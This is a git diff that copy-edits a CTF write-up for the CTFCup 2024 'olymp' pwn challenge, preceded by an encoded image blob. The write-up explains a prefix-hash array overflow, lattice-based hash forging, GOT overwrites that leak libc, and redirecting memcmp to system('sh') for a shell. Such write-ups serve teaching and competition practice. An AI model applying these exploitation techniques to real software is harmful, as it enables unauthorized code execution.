zlAzW@UQsVPHK5KO?6t^R&ecO3kAv@elNLe^`g9(>BamLV>s1H))eur5rchU<>cECu zqmdtG(ENFrAo!3eKbAW0;sfh2K+fkvzI>jVBFISi2MX)FTEpaALk?QFBH@dOfx+rx zO4I{}-(dBu^#}D z4Eux%y9fB|Ozq;U0qeUN*CHmf<(lGa(`;RCw8y)sz`zVpm59E|HPqX5pi19NPh6A>Wl@eFlU_;f-e}yfI0c@D5@e)py0A z@F{NXU@R@)z80bgB?-^Q&0k!Nzp1PId`@qnM@zQ6Ja6q$s%&^!(60`Eh+?F7k)ZJA^ah=Qt>+0{Bt`AtShDS zCw((r0Y@&P6oh9Mv!~b(y!(8k;B5>h`C~6lG20)dq<+seHg7|Ss=Eu$ zkkht7Arqgv^D5W;*n{^Jwv>srKQ^;?;AsBQ(j-ZRi}MNB#VzyEmI+TwKfn+B^mF`o zLlZmB3L+kK_1C$@khDBn3zoCA`c15h*Erp-W46cUrtwmoAnGUMJ(+s2R#A5zucvXM zzSA8SH$$wmo3WR((SyOG^U;OQM9nJx*9~*e+4j zY9I`p#*Bo)V{2kCGN ze$R9sf$qvOa-zfy;OL4&YKN1zCv_lt9c|zHAX>-rN#!Hj^wi|3OeX&HCqrrvW@~BggYA8yP;|A2vi3jB?cZTQ`|aUtZM!XUkp{ zhpKg}Kk)3}@pX$d>VEqIw3JgXxn`@r&_N-2tfi5c&Hxa_KkEqxfdN0_9dMo%yHS2G z0{M`8CjoZ3atBE$N2#x)H= zMNy2-K(p%gJL5{P!Y)I}Y$O)Qo=09nOIAWDdOO3M40JpWhxB!Gq(^~cT<7nY9d@F7 zb1*{5a3fzLCeuuO-)ISB^GV?DHu{ykIH=v+A&_l>TtoHW2?g=P!6pJFKB}^@hzI+L zav#lC6uMMyRcsPwwu)WRFXx|O;xVC7;3wUaVfB!fF*3X2#hSg~kT z*ziE1ZFF>_*F{nD4~3N975E1JVABkHnHkc*ECXq}8_fymI%~vhiK*fS{u(bPb@;hm zb6;2*jmYW*7K-F--jr%1y8ronLR^GY?2Vg9T(!Scx}^wWnCD1CCrrm$8C^#?hxNBBeKRD7olqCyKDR?Mz0 z{X5B)Zahz;pZ-s03&pPKXKqIIuX9FG_ZYErKEG{2$ak-pzp>jNMt6*lQ%LCq>-$fi zfhoiAEqSWHS+N?ViCD5QrxH>$XX&TP+sG|y=yrJ<6*x0-)39DMg8Slj>`#ShaALngWV0XxENw4w>F#qM$&x@_hC9V?Rv0 zKGzUk-L-c7z^$&EL7)U-&==aZ=wlqm&Ln^ug)tL?8zID8Dwl-*<=prIMaGs($#U}kz}{(k0Sc#E zE0P%*ih6^z0qPZ^9f;DkA(i}1fd_ebUy$N1A%V5&H2|X?wDeCY_rF@E$lZT-fPnrFHx;3^ literal 0 HcmV?d00001 diff --git a/content/blog/ctfcup2024-olymp/index.md b/content/blog/ctfcup2024-olymp/index.md index 8698d79..3f7fd89 100644 --- a/content/blog/ctfcup2024-olymp/index.md +++ b/content/blog/ctfcup2024-olymp/index.md @@ -6,7 +6,7 @@ params: links: - name: channel link: https://t.me/theinkyvoid -title: "ctfcup 2024 - olymp" +title: "CTFCup 2024 - olymp" tldr: "unsolved crypto pwn task from a ctfcup organized by us" date: "2024-10-31" tags: [pwn, crypto] @@ -16,15 +16,16 @@ summary: | # olymp (ctfup 2024) -I was running out of time organizing ctfcup 2024, especially conserning pwn challenges. But then I thought what about an algorithmic pwn challenge and thus olymp was born. Sadly no one was able to solve it during the ctf, thus I am publishing this writeup. +While organizing CTFCup 2024, I was running out of time, especially concerning pwn challenges. Then I had an idea - what about an algorithmic pwn challenge? And thus olymp was born. Sadly, no one was able to solve it during the CTF, so I am publishing this writeup. ## Quick summary -The task is basicly solving a problem, where given a string `s` answer queries of the form `compare s[a:b] s[c:d]`. To this end it first inputs the number of test cases, then for each test case reads a string from `std::cin` into a `std::string` variable on `bss`, builds the prefix hash array, reads the number of queries from `std::cin` (which will be important later), then for each query reads four numbers, compares appropriate string computed hashes and if those are equal compares the substrings themselves. +The task involves solving a problem where, given a string `s`, we need to answer queries of the form `compare s[a:b] s[c:d]`. The program first inputs the number of test cases. For each test case, it reads a string from `std::cin` into a `std::string` variable in the BSS segment and builds a prefix hash array. It then reads the number of queries from `std::cin` (which becomes important later). For each query, it reads four numbers representing the substring bounds, compares the computed hashes of the substrings, and if the hashes match, performs a direct comparison of the substrings themselves. ## The vuln -The vuln is quite easy to spot when reading the source code (which was provided). There is no control over how much prefix hashes we build, meaning we can overflow into `s`, where conveniatly the first field is the data pointer, allowing us to get arbitrary write (PIE was disabled). +The vulnerability is quite easy to spot when reading the source code (which was provided). There is no bound checking on how many prefix hashes we build, meaning we can overflow into the string `s`, where conveniently the first field is the data pointer, allowing us to get arbitrary write (PIE was disabled). + ```c++ #define MAX_LENGTH 200 @@ -44,10 +45,10 @@ void build_prefix_hashes() { } ``` - ## Forging a hash -Before we can exploit the overflow we have to be able to create such a string, that its polymial hash is equal to arbitrary value `target`. Lets refolmulate the problem in terms of lattices, the polymial hash of string `s` is equal to `P(s) = p ^ (len(s) - 1) s[0] + p ^ (len(s) - 2) s[1] + ... + p ^ 0 s[len(s) - 1] mod P`, pick the middle of the alphabet `ord('n')`, we want to find the minimal vector satisfying `P(midle * len(v)) - P(v) = 0`, for which the corresponding lattice is +Before we can exploit the overflow, we have to be able to create a string whose polynomial hash equals an arbitrary value `target`. Let's reformulate the problem in terms of lattices. The polynomial hash of string `s` is equal to `P(s) = p^(len(s)-1) * s[0] + p^(len(s)-2) * s[1] + ... + p^0 * s[len(s)-1] mod P`. If we pick the middle of the alphabet `ord('n')`, we want to find the minimal vector satisfying `P(middle * len(v)) - P(v) = 0`. The corresponding lattice is + ```python L = IntegerLattice( [ @@ -58,24 +59,25 @@ L = IntegerLattice( + [[W * P] + [0] * len(known)] ) ``` + Then we just use `L.approximate_closest_vector` from sage and obtain our string. ## Leaking libstdc++ -The easiest thing we can do is overwrite `std::istream::operator>>(int &)` to `puts`. Then it will be called with `std::cin` as the first argument and thus we can leak libstdc++. I thought that was enough and libstdc++ would always allocate after libc, but during final testing that turned out not to be case. +The easiest thing we can do is overwrite `std::istream::operator>>(int &)` with `puts`. When called with `std::cin` as the first argument, this allows us to leak libstdc++. I initially thought this would be sufficient since libstdc++ typically allocates after libc, but during final testing this turned out not to be the case. ## Leaking libc -Leaking libc on the other hand is a bit more tricky. First we have to notice that comparing two substrings actually uses `memcmp` +Leaking libc is a bit more tricky. First, we need to notice that comparing two substrings actually uses `memcmp`: -![comparing uses memcmp](compare_memcmp.png) +![comparing uses memcmp](compare_memcmp.webp) -We can overwrite `memcmp` with `puts` and the rest of the got with the resolvers. Then call the comparison on the same indexes (such that the first index corresponds to `memcmp` got) two times (which intern will call puts): the first to resolve puts, the second to leak it. +We can overwrite `memcmp` with `puts` and the rest of the GOT with resolvers. Then we call the comparison on the same indexes (such that the first index corresponds to the `memcmp` GOT entry) twice: the first call resolves puts, and the second call leaks it. ## Running system -Finally we can use the same `memcmp` trick: overwrite `memcmp` with `system`, `setvbuf` got with `"sh\x00"`, the run the comparison on `0 1`, intern calling `system("sh\x00")`. You can check the full sploit [here](sploit.py). +Finally, we can use the same `memcmp` trick: overwrite `memcmp` with `system`, overwrite the `setvbuf` GOT entry with `"sh\x00"`, then run the comparison on indexes `0 1`, which internally calls `system("sh\x00")`. You can check the full exploit [here](sploit.py). ## Conclusion -Overall I thought the challenge was quite easy, but it turned to be quick tricky even after the forging of the hash was fully hinted. +Overall, while I initially thought the challenge was quite easy, it turned out to be quite tricky even after the hash forging technique was fully hinted at.